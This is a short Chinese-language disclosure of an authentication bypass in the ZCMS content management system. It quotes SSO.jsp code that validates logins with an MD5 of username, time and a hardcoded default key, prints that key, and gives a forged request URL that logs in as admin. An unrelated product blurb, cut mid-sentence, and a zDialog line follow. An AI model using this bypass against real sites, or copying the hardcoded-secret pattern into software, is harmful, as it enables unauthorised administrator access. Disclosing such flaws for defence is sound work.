认证绕过：Zcms单点登录认证缺陷 <%@page import="com.zving.platform.Login"%> <%@page import="com.zving.framework.utility.StringUtil"%> <% String username = request.getParameter("u"); String time = request.getParameter("t"); String str = request.getParameter("s"); String key = "WIU%&*DJAJKL%^*W(DLJIST"; String s = StringUtil.md5Hex(username + time + key); if (s.equals(str)) { Login.ssoLogin(request, response, username); } %> // key安装后缺省都是“WIU%&*DJAJKL%^*W(DLJIST”，可以计算出s登录后台 //SSO.jsp?u=admin&t=2010/1/11&s=f7edb87197b4437df8651ae320623006 提示：所有发布版不能用统一的缺省值来完成某些必须要执行的信息。

泽元网站内容管理系统 (简称ZCMS) 是一套基于J2EE和插件技术的、面向高端用户的网站内容管理软件，集内容规划、内容创作、内容编辑、内容审核、基于模板的内容发布等功能于一身，并提供互动组件、可视化专题、内容采集、内容检索、访问统计等扩展功能。通过简

zDialog3.0 zDialog升级最新版, zDialog在zcms提取最新版